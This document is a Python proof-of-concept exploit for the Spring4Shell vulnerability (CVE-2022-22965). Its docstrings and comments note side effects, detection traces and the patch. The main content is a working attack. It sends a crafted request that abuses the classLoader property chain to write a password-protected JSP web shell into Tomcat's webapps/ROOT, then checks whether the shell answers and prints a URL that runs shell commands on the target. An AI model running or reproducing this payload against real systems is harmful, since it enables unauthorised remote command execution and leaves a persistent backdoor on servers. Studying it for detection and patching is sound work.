Poc_CVE-2022-22965
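import argparse
import requests
import time
from urllib.parse import urljoin
import urllib3

# Every request below is sent with verify=False, so the matching urllib3
# warning is silenced for the whole process.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def run(url):
    """Check a single URL for CVE-2022-22965 and print the outcome.

    Sends one POST whose form body sets the
    ``class.module.classLoader.resources.context.parent.pipeline.first.*``
    properties (pattern, suffix, directory, prefix, fileDateFormat), waits
    ten seconds, then requests ``tomcatwar.jsp`` relative to ``url`` and
    reports the target as likely vulnerable when that answers HTTP 200.

    Side effects on a vulnerable target: the properties named in the body
    stay changed and ``tomcatwar.jsp`` is left under ``webapps/ROOT``. This
    function restores nothing and deletes nothing, so both have to be
    cleaned up on the host after the check.

    Traces for detection: form parameters whose names start with
    ``class.module.classLoader``, and an unexpected ``tomcatwar.jsp`` in
    ``webapps/ROOT``. The durable fix is a Spring Framework release that
    contains the patch for this CVE.

    Args:
        url: Full URL (with scheme) of an endpoint on the target.

    Returns:
        None. Results and request errors are printed to stdout.
    """
    # The "pattern" value in the body refers to these headers through
    # %{c1}i, %{c2}i and %{suffix}i (URL-encoded there).
    headers = {
        "suffix": "%>//",
        "c1": "Runtime",
        "c2": "<%",
        "DNT": "1",  # Do Not Track
        "Content-Type": "application/x-www-form-urlencoded",
    }
    data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22w%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="

    try:
        # verify=False skips TLS certificate validation;
        # allow_redirects=False refuses the default 301/302 following.
        requests.post(
            url=url,
            data=data,
            headers=headers,
            verify=False,
            allow_redirects=False,
            timeout=15,
        )
        time.sleep(10)
        # NOTE(review): urljoin resolves against the path of ``url``, while
        # the body above names webapps/ROOT; for a ``url`` with a deeper
        # path the probe may miss the file and report nothing.
        shellurl = urljoin(url, 'tomcatwar.jsp')
        # stream=True leaves the body unread, so the response is closed
        # explicitly by the with-block instead of holding the connection.
        with requests.post(
            shellurl,
            allow_redirects=False,
            verify=False,
            stream=True,
            timeout=15,
        ) as shellexploit:
            print(shellexploit)
            # A 200 is only an indication: a server that answers 200 for
            # any path gives the same result. Confirm on the host itself.
            if shellexploit.status_code == 200:
                print("It looks likely vulnerable"+" please copy and skip "+shellurl+"?pwd=w&cmd=ls")
    except requests.RequestException as e:
        # Connection, timeout and malformed-URL errors are reported, not
        # raised, so the script always ends normally.
        print(e)


if __name__ == '__main__':
    parameter = argparse.ArgumentParser(description='Poc CVE-2022-22965:')
    # NOTE(review): --file is accepted but never read by this script.
    parameter.add_argument('--file', help='url file', required=False)
    parameter.add_argument('--url', help='ip:port', required=False)
    para = parameter.parse_args()

    if para.url:
        run(para.url)
    else:
        parameter.print_help()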
此poc借鉴了一下——https://github.com/BobTheShoplifter/Spring4Shell-POC